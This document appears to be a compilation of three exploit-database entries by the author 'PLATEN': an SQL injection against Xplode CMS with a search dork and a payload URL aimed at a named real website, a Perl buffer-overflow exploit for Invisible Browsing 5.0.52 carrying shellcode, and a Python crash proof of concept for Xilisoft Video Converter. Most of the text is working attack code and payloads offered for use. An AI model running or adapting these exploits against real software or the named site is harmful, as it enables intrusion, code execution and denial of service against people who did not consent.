Xplode CMS – ‘wrap_script’ SQL Injection
#---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms
#
# Xplode SQL Injection Vulnerabilities
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com dork: "Powered by Xplode CMS"
#----------------------------------------------------------------------------------------------

===[ SQL ]===

http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]

example & demo:

http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--

#----------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-08]
Source: https://www.exploit-db.com/exploits/8373

Invisible Browsing 5.0.52 – ‘.ibkey’ Local Buffer Overflow
#!/usr/bin/perl
print qq(
############################################################
## Iranian Pentesters Home                                ##
## Www.Pentesters.Ir                                      ##
## PLATEN -[ H.jafari ]-                                  ##
## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit   ##
## bug found & exploited by: PLATEN                       ##
## E-mail && blog:                                        ##
## hjafari.blogspot.com                                   ##
## platen.secure[at]gmail[dot]com                         ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                ##
## and all members in Pentesters.ir                       ##
############################################################
);
# Note: I just test this version
$junk = "\x41" x 5000;
$ret = "\x93\x43\x92\x7c";
$nop = "\x90" x 50;
# win32_exec - Size=160 #EXITFUNC=seh CMD=calc #Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
open(fhandle,'>>expl.ibkey');
print fhandle $junk.$ret.$nop.$shellcode;
close(fhandle);
print "\n [+] File created successfully: expl.ibkey \n";

# milw0rm.com [2009-09-14]

Source: https://www.exploit-db.com/exploits/9655

Xilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow
source: http://www.securityfocus.com/bid/38854/info

Xilisoft Video Converter is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

#!/usr/bin/python
#
# Xilisoft Video Converter(.yuv file) Stack buffer Overflow Poc
# Homepage: www.xilisoft.com
# #############################################################################
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web: WwW.ITSecTeam.com
# Forum: WwW.forum.itsecteam.com
# Exploit Coded by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam
# Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder
# #############################################################################
# Bug: Integer Division By Zero
# Tested in : Windows XP SP3 EN
# Tested version : 3 = Crash
# Usage: ./Xilisoft-poc.py
# #############################################################################
# 102DFDAB: Integer divide by zero (exc.code c0000094, tid 2908)
# EAX 00000000 ECX 00000000 EBX 00000001 ESP 000E629C EBP 025B3270
# ESI 00000000 EDI 00000000 EIP 102DFDAB avcodec.102DFDAB
try:
    file = open("Xilisoft-poc.yuv", 'w')
    Buff = "\x41" * 500000
    file.write(Buff)
    file.close()
    print("[+] File created successfully: Xilisoft-poc.yuv")
except:
    print("[-] Error cant write file to system\n")

Source: https://www.exploit-db.com/exploits/33775